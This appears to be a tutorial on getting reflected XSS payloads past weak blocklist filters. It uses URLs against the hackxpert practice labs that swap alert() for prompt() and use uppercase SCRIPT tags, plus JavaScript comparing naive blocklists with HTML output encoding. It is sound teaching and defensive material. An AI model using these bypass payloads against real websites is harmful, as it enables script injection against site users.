Alert
My friends, everyone and their grandmother knows about alert(), so stop using it as your proof-of-concept payload. Almost all of my labs filter it, and so does almost anything in the wild: a filter that rejects the string "alert" is the cheapest one a developer can write, and it is the first one they write. Reach for another function that proves execution just as well, such as prompt() or confirm().
For example, this payload is blocked because the reflected value contains the string "alert":
https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dalert()>
But this one, which only swaps the function name and leaves the injection itself untouched, works:
https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dprompt()>
confirm
The same goes for confirm(): when a lab or a target filters confirm() as well, switch to yet another way of proving execution, for example print(), which opens the print dialog and is rarely on anyone's blocklist. A blocklist of function names can only ever enumerate what its author thought of, so there is always another way around it.
lowercase filtering
https://hackxpert.com/labs/RXSS/GET/10.php?fname=<script>alert()<%2Fscript>
If we look at this example, the lowercase string “script” appears to be blocked. HTML tag names are case-insensitive, so the browser treats <SCRIPT> exactly like <script>, but a filter that compares strings case-sensitively does not. So what if we try “SCRIPT”?
https://hackxpert.com/labs/RXSS/GET/10.php?fname=<SCRIPT>alert()<%2FSCRIPT>
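To make both bypasses concrete, here is an added example that is not code from this page or from the hackxpert labs (their server-side source is not shown, so the blocklists below are a hypothetical model of the behaviour the four URLs demonstrate). It runs the fname values from those URLs through a case-sensitive substring blocklist, the minimal case-insensitive version, and the fix a developer should have used instead: contextual HTML output encoding, which neutralises every payload regardless of function name or tag case.

```javascript
// Hypothetical blocklists modelling what labs 11 and 10 appear to reject.
// These are assumptions for the example, not the labs' real source.
const BLOCKLIST_LAB11 = ["alert"];   // lab 11: only the string "alert" is caught
const BLOCKLIST_LAB10 = ["script"];  // lab 10: only lowercase "script" is caught

// Weak filter: case-sensitive substring match. Returns true when rejected.
function naiveFilter(input, blocklist) {
  return blocklist.some((bad) => input.includes(bad));
}

// Slightly better: case-insensitive. Catches <SCRIPT>, but it is still a
// blocklist and still misses anything it does not enumerate (prompt(), print()).
function caseInsensitiveFilter(input, blocklist) {
  const lower = input.toLowerCase();
  return blocklist.some((bad) => lower.includes(bad.toLowerCase()));
}

// The actual fix: the parameter is reflected into an HTML text node, so encode
// the characters that have meaning there instead of guessing at bad strings.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Does the string still contain something the HTML parser would treat as a tag?
function stillHasTag(s) {
  return /<[a-zA-Z]/.test(s);
}

// Decode the fname query parameter the way a server would (%xx and + handled).
function fnameFromUrl(url) {
  return new URL(url).searchParams.get("fname");
}

// Constructed inputs: the exact fname values from the lab URLs above.
const PAYLOADS = {
  alertImg: fnameFromUrl("https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dalert()>"),
  promptImg: fnameFromUrl("https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dprompt()>"),
  lowerScript: fnameFromUrl("https://hackxpert.com/labs/RXSS/GET/10.php?fname=<script>alert()<%2Fscript>"),
  upperScript: fnameFromUrl("https://hackxpert.com/labs/RXSS/GET/10.php?fname=<SCRIPT>alert()<%2FSCRIPT>"),
};

// Lab 11: swapping alert() for prompt() walks straight past the blocklist.
function lab11Results() {
  return {
    alertBlocked: naiveFilter(PAYLOADS.alertImg, BLOCKLIST_LAB11),   // true
    promptBlocked: naiveFilter(PAYLOADS.promptImg, BLOCKLIST_LAB11), // false: bypass
  };
}

// Lab 10: <SCRIPT> is the same tag to the browser but not to a case-sensitive filter.
function lab10Results() {
  return {
    lowerBlocked: naiveFilter(PAYLOADS.lowerScript, BLOCKLIST_LAB10),             // true
    upperBlocked: naiveFilter(PAYLOADS.upperScript, BLOCKLIST_LAB10),             // false: bypass
    upperBlockedCI: caseInsensitiveFilter(PAYLOADS.upperScript, BLOCKLIST_LAB10), // true
  };
}

// Output encoding: no payload survives as markup, whatever it contained.
function encodedResults() {
  return Object.fromEntries(
    Object.entries(PAYLOADS).map(([name, p]) => [name, stillHasTag(htmlEncode(p))])
  );
}

console.log(lab11Results(), lab10Results(), encodedResults());
```

The point of the last function is the one to take away as a developer: every entry comes back false, because encoding changes what the browser parses rather than trying to predict what an attacker types.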